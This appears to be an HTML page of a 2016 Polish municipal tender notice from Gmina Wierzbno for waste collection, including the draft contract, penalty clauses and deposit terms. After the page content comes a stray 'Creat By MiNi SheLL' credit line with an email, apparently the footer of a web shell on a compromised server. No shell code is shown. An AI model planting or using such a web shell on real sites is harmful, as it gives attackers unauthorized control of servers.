                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">
projekt umowy na odbiór  i zagospodarowanie odpadów komunalnych z Gminy Wierzbno
 

UMOWA  Nr ..... /2016


zawarta w dniu  w Wierzbnie, pomiędzy:
Gminą Wierzbno z siedzibą w Wierzbnie Nr 90, 07-111 Wierzbno
zwaną dalej Zamawiającym,
reprezentowaną przez Wójta Gminy  Hannę Kelleher, za kontrasygnatą 


Skarbnika Gminy  Marty Haładaj
a
.................................................................
z siedzibą w .................................................................
zwanym dalej Wykonawcą,
reprezentowanym przez: .....................................................................
wpisanym do rejestru .................................................................
pod numerem .................................................................

Przedmiotem umowy jest odbiór odpadów komunalnych pochodzących z nieruchomości zamieszkałych na terenie gminy Wierzbno wraz z ich transportem i zagospodarowaniem, w okresie od 1 stycznia 2017 r. do 31 grudnia 2018 r. (zgodnie ze SIWZ oraz ofertą złożoną w ramach przetargu).

§ 1

Podstawę zawarcia umowy stanowi przeprowadzone postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego, zgodnie z ustawą z 29 stycznia 2004 r.Prawo zamówień publicznych (Dz.U. z 2015r., poz. 2164 z późn. zm.).

§ 2

1. Zamawiający zleca a Wykonawca przyjmuje do realizacji usługę odbioru i transportu do miejsc  
    odzysku / unieszkodliwienia /zagospodarowania odpadów komunalnych z terenu gminy  
    Wierzbno, pochodzących od właścicieli nieruchomości zamieszkałych w miejscowościach 
    wymienionych w Specyfikacji Istotnych Warunków Zamówienia.
2. Szczegółowy zakres zadań do wykonania i wymagania stawiane Wykonawcy określone zostały 
    przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia, stanowiącej załącznik do 
    umowy.

§ 3

Czas realizacji zamówienia określa się na 24 miesiące: od  01.01.2017 r. do 31.12.2018 r.

§ 4

1. Zamawiający zobowiązuje się do:
1) współpracy z Wykonawcą przy tworzeniu szczegółowego planu wywozu określonego 
    w harmonogramie; 
2) przekazania Wykonawcy wykazu nieruchomości, z których prowadzona będzie zbiórka odpadów;  
3) przekazywania Wykonawcy informacji niezbędnych dla prawidłowego wykonywania 
    przedmiotu umowy, w szczególności przekazywania aktualnej informacji o nieruchomościach  
    objętych odbiorem odpadów komunalnych;
4) informowania Wykonawcy o każdej zmianie prawa miejscowego mogącej mieć wpływ na  
    realizację zamówienia (np. o zmniejszeniu ilości rodzajów/kolorów worków do zbiórki   
    selektywnej). 

2. Zamawiający ma prawo do:

1) kontroli sposobu, częstotliwości i jakości wykonywanych usług - na żądanie Zamawiającego  
    Wykonawca zobowiązany jest do niezwłocznego skierowania swojego przedstawiciela do udziału  
    w kontroli realizacji przedmiotu umowy; 
2) zmiany- za zgodą Wykonawcy- częstotliwości wywozu odpadów komunalnych w uzasadnionych   
    przypadkach (np. klęska  żywiołowa, przemarsz pielgrzymki).
    Zmiana taka nie stanowi zmiany umowy i nie ma wpływu ma wysokość wynagrodzenia 
    Wykonawcy.

§ 5

1. Wykonawca zobowiązuje się do:

1) wykonania wszystkich obowiązków wymienionych w Specyfikacji Istotnych Warunków   
    Zamówienia do prowadzonego postępowania przetargowego;
2) wykonywania obowiązków objętych zamówieniem z należytą starannością , stosownie do 
    dyspozycji art. 355 k.c. oraz zgłaszania wszelkich okoliczności wpływających na należyte ich 
    wykonanie; 
3) udzielania  na żądanie Zamawiającego  informacji dotyczących stanu realizacji umowy, 
    niezwłocznie, nie później niż w terminie 2 dni od otrzymania wniosku w tej sprawie; 
4) przestrzegania postanowień ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych  
    (Dz.U.z 2015r. poz.2135 ) Wykonawca może wykorzystywać pozyskane dane osobowe wyłącznie 
    w celu realizacji umowy, zakazuje się wykorzystywania danych w celach  marketingowych lub 
    reklamowych;
5) wyposażenia właścicieli nieruchomości w worki o parametrach i kolorach określonych w SIWZ 
    w terminie do 30 grudnia 2016 r., zaś w kolejnych miesiącach - w terminach określonych w 
    harmonogramie odbioru odpadów w poszczególnych miejscowościach; 
6) niezwłocznego informowania Zamawiającego o każdym przypadku oddawania przez właścicieli 
    nieruchomości zmieszanych odpadów komunalnych jako odpady zbierane selektywnie, w sposób
    określony w SIWZ;
7) przekazywania Zamawiającemu  sprawozdań i informacji, zgodnie z zapisami pkt 
    I.2.6 SIWZ;
8) zagospodarowania zebranych odpadów w sposób, który zapewni osiągniecie poziomów  
    recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami, o których mowa w  
    Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, 
    przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów  
    komunalnych (Dz. U. z 2012 r. poz. 645).
9) przekazywania zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z 
    sortowania odpadów komunalnych odebranych od właścicieli nieruchomości zamieszkałych 
    położonych na terenie gminy Wierzbno do regionalnej instalacji do przetwarzania odpadów
    komunalnych w Siedlcach /Ostrołęce. W przypadku wystąpienia awarii RIPOK,  
    uniemożliwiającej odbieranie odpadów komunalnych, o których mowa powyżej, odpady te   
    przekazuje się do instalacji zastępczej obsługi tego regionu, wskazanych w uchwale w sprawie 
    wykonania Wojewódzkiego Planu Gospodarki Odpadami;





Wykonawca oświadcza, że:
1) posiada wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Wierzbno 
    pod Nr .;
2) posiada uprawnienia do transportu odpadów wynikające z zezwolenia na transport odpadów lub 
    zezwolenia na odzysk i unieszkodliwianie odpadów wydane przez Starostę
    w dniu .. Nr .., w zakresie objętym przedmiotem 
    zamówienia;
3) posiada wpis do rejestru zbierających zużyty sprzęt elektryczny i  elektroniczny prowadzonego
     przez Głównego Inspektora Ochrony Środowiska, zgodnie z ustawą z dnia 11 września 2015 r. o 
    zużytym sprzęcie elektrycznym i elektronicznym,
4) zawarł umowę z  na przyjmowanie odebranych od właścicieli
                                       (nazwa właściwej RIPOK)
    nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z  
    sortowania odpadów.
§ 7

Wykonawca obowiązany jest realizować prace objęte umową siłami własnymi.*
lub
1. Następujące roboty...............................................................................................................  
    Wykonawca zamierza zlecić podwykonawcy* .....................................................................
                                                                                                           (wskazać podwykonawcę) 

2. Jakakolwiek przerwa w realizacji przedmiotu  umowy wynikająca z przyczyn Podwykonawcy 
    będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy. 
3. Wykonawca ponosi pełną odpowiedzialność za prawidłową realizację zadań powierzonych 
    podwykonawcy. 
4. Na wniosek Zamawiającego Wykonawca zobowiązany jest do przedstawienia umowy 
    zawartej z podwykonawcą.
§ 8

1. Wynagrodzenie Wykonawcy za usługi stanowiące przedmiot umowy, określone w ofercie
    z dnia ........................ wynosi ................................. złotych netto,
    słownie: .............................................................  złotych.
    Podatek VAT ... %  -   ................... złotych.
    Łącznie wynagrodzenie brutto wynosi ................................ złotych,
    słownie: ......................................................................................... złotych.
2. Przewiduje się miesięczne rozliczanie świadczonych usług po zakończeniu miesiąca, w którym  
    były wykonywane. 
3. Podstawę do wystawienia faktury stanowi miesięczny raport z ilości i rodzajów zebranych przez  
    Wykonawcę odpadów.
4. Zapłata za wykonane roboty nastąpi w ciągu  ........ dni od złożenia przez Wykonawcę 
    faktury VAT,  przelewem na konto  Wykonawcy Nr . 
    w Banku .........
5. Za dzień zapłaty uważa się datę obciążenia rachunku Zamawiającego.

§ 9

Z tytułu niewykonania lub nienależytego wykonania umowy Strony ustalają następujące kary umowne :
1. Wykonawca zapłaci Zamawiającemu karę umowną za:
    1) nieterminowe wykonanie określonych w niniejszej umowie prac  w wysokości  0,2 %
        wynagrodzenia określonego w § 8 ust.1 za każdy dzień zwłoki,
    2) za odstąpienie od umowy z przyczyn zależnych od Wykonawcy  w wysokości 10 % wynagro-
        dzenia umownego,
    3) za zwłokę w usunięciu stwierdzonych nieprawidłowości w wykonaniu przedmiotu umowy, 
        do usunięcia których Wykonawca został zobowiązany przez Zamawiającego, w wysokości 
        0,2 % wynagrodzenia określonego w § 8 ust.1 za każdy dzień zwłoki liczony od upływu dnia  
        wyznaczonego na usunięcie nieprawidłowości do dnia ich usunięcia, 
    4) za każde stwierdzone przez osobę sprawującą kontrolę niewykonanie lub nienależyte 
        wykonanie przedmiotu umowy: 
        a) za odbieranie odpadów bez zachowania należytego stanu sanitarnego lub technicznego 
            pojazdów - w wysokości 500 zł, 
        b) za nieuprzątnięcie terenu z odpadów komunalnych, które uległy rozsypaniu podczas 
            załadunku - w wysokości 100 zł, 
        c) za nieprzekazywanie Zamawiającemu w terminie kwartalnych sprawozdań i informacji, o   
            których mowa w SIWZ - w wysokości 100 zł, 
2. Zamawiający zapłaci Wykonawcy karę umowną za:
    1) zwłokę w zapłacie faktur  w wysokości 0,2 % wynagrodzenia określonego w § 9 ust.1
        za każdy dzień zwłoki,
    2) za odstąpienie przez Zamawiającego od umowy z przyczyn leżących po jego stronie 
        w wysokości 10 % wynagrodzenia umownego.
3. Kwoty należne Zamawiającemu z tytułu kar umownych, mogą być potrącane z płatności 
    realizowanych na rzecz Wykonawcy, w oparciu o wystawioną przez niego notę księgową.

§ 10

1. Wykonawca złoży na rzecz Zamawiającego zabezpieczenie należytego wykonania umowy
    w wysokości 5% ceny uzyskanej w wyniku przetargu, stanowiącej wynagrodzenie za wykonanie
    umowy, określone w § 8 ust.1, tj. kwotę ....................... złotych.
2. Wykonawca wniesie zabezpieczenie należytego wykonania umowy w formie:
    .............................................................................................................................................................
    .............................................................................................................................................................
3. Dopuszcza się zmianę formy zabezpieczenia w trakcie realizacji umowy z zachowaniem jego  
    ciągłości oraz bez zmiany jego wysokości.
    Wykonawca jest obowiązany o tym fakcie powiadomić Zamawiającego w terminie
    gwarantującym ciągłość zabezpieczenia.



§ 11

1. Stronom przysługuje prawo do odstąpienia od umowy:
    1) Wykonawcy, gdy Zamawiający nie ureguluje na bieżąco zapłaty za faktury i mimo wezwań  
         zwleka z zapłatą dłużej niż dwa miesiące od terminu zapłaty.
    2) Zamawiającemu, gdy
        a) Wykonawca narusza w sposób istotny postanowienia umowy - po bezskutecznym upływie 
            terminu wyznaczonego do zmiany sposobu wykonania robót,
        b) wystąpiła istotna zmiana okoliczności powodująca, że wykonanie umowy nie leży w 
             interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy; 
             odstąpienie od umowy w tym wypadku może nastąpić w terminie 30 dni od powzięcia 
             wiadomości o tych okolicznościach- bez kar umownych określonych w §  ust. 2 niniejszej 
             umowy.
2. Zamawiający może wypowiedzieć umowę ze skutkiem natychmiastowym, jeżeli poweźmie
    wiadomość o tym, że Wykonawca:
    1) został postawiony w stan likwidacji lub upadłości,
    2) przystąpił do rozwiązania firmy,
    3) zawiesił działalność gospodarczą,
    4) utracił wpis do rejestru działalności regulowanej (Gminy Wierzbno) w zakresie odbierania
        odpadów komunalnych od właścicieli nieruchomości,
    5) bez uzasadnionego powodu nie przystąpił do prac w terminie do 15.01.2017 r. lub wstrzymał
        prace i nie podjął ich w ciągu 5 dni.
    6) został wydany nakaz zajęcia majątku Wykonawcy.
3. Oświadczenie o odstąpieniu od umowy może być złożone w terminie 30 dni od  dnia powzięcia  
    wiadomości o przyczynach stanowiących podstawę odstąpienia.
4. Odstąpienie od umowy wymaga formy pisemnej.

§ 12

Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnego aneksu.

§ 13

Sprawy sporne dotyczące niniejszej umowy rozpatrywane będą przez sąd miejscowo właściwy
dla siedziby Zamawiającego.

§ 14

W sprawach nie uregulowanych niniejszą umową mają zastosowanie przepisy kodeksu cywilnego.

§ 15

Umowę sporządzono w czterech jednobrzmiących egzemplarzach, po dwa dla każdej ze stron.

§ 16

Załączniki stanowiące integralną część umowy:
- specyfikacja istotnych warunków zamówienia,
- wykaz nieruchomości, z których prowadzona będzie zbiórka odpadów .


Z A M A W I A J Ą C Y                                                                      W Y K O N A W C A





Objaśnienie 

* stosownie do oświadczenia Wykonawcy w ofercie
</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px">1. Zamawiający żąda wniesienia zabezpieczenie należytego wykonania umowy w 
    wysokości 5 % całkowitej ceny ofertowej brutto podanej w ofercie. 
2. Wykonawca wnosi zabezpieczenie przed podpisaniem umowy. 
3. Zabezpieczenie może być wnoszone w pieniądzu, poręczeniach bankowych lub 
    poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że 
    zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; gwarancjach 
    bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez 
    podmioty, o których mowa w art.6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o 
    utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Zabezpieczenie wnoszone w pieniądzu wpłaca się przelewem na rachunek 
    bankowy Zamawiającego - ..
    Wniesienie zabezpieczenia w pieniądzu przelewem na rachunek bankowy 
    wskazany przez Zamawiającego będzie skuteczne z chwilą uznania tego rachunku 
    kwotą zabezpieczenia (wpływ środków pieniężnych na rachunek bankowy   
    wskazany przez Zamawiającego musi nastąpić przed podpisaniem umowy).
    Zamawiający, za zgodą Wykonawcy, zaliczy wadium na poczet zabezpieczenia.
5. Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w wekslach z porę- 
    czeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo- kredytowej, 
    przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb 
    Państwa lub jednostkę samorządu terytorialnego oraz przez ustanowienie zastawu 
    rejestrowego na zasadach określonych w przepisach o  zastawie rejestrowym i 
    rejestrze zastawów.
6.Wykonawca wniesie zabezpieczenie najpóźniej w dniu zawarcia umowy.
7. Koszty wystawienia zabezpieczenia ponosi Wykonawca.
8. Jeżeli zabezpieczenie należytego wykonania umowy wniesiono w pieniądzu, 
    Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku 
    bankowego, na którym było przechowywane, pomniejszone o koszty prowadzenia 
    rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
9. Zabezpieczenie należytego wykonania umowy podlega zwrotowi na rzecz 
    Wykonawcy w terminie 30 dni od dnia wykonania zamówienia i uznania przez 
    Zamawiającego za należycie wykonane.
10. Wykonawca może , w trakcie realizacji umowy, zmienić formę zabezpieczenia, na 
    zasadach określonych w art. 149. Pzp.
</div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Wszelkie zmiany umowy pod rygorem nieważności wymagają formy pisemnej.
2.Strony dopuszczają możliwość dokonania zmian postanowień umowy w stosunku do treści oferty :
   1) w przypadku zmiany ustawowej stawki podatku od towarów i usług; w takim przypadku ulegnie   
       zmianie wynagrodzenie ryczałtowe w kwocie brutto, z uwzględnieniem obowiązującej stawki 
       podatku VAT;
   2) w przypadku zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie 
       dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w 
       formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do 
       wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie 
       spowoduje zmiany wynagrodzenia Wykonawcy. Inicjatorem tej zmiany może być Zamawiający 
       lub Wykonawca;
   3) w przypadku zmiany:
       - wysokości minimalnego wynagrodzenia za prace ustalonego na podstawie art. 2 ust. 3-5  
         ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2015 r. 
         poz. 2008), 
       - zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości 
         stawki składki na ubezpieczenia społeczne lub zdrowotne. 
Jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 7 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania zamówienia, natomiast spowoduje zmianę wynagrodzenia Wykonawcy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 30/11/2016, godzina: 9:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com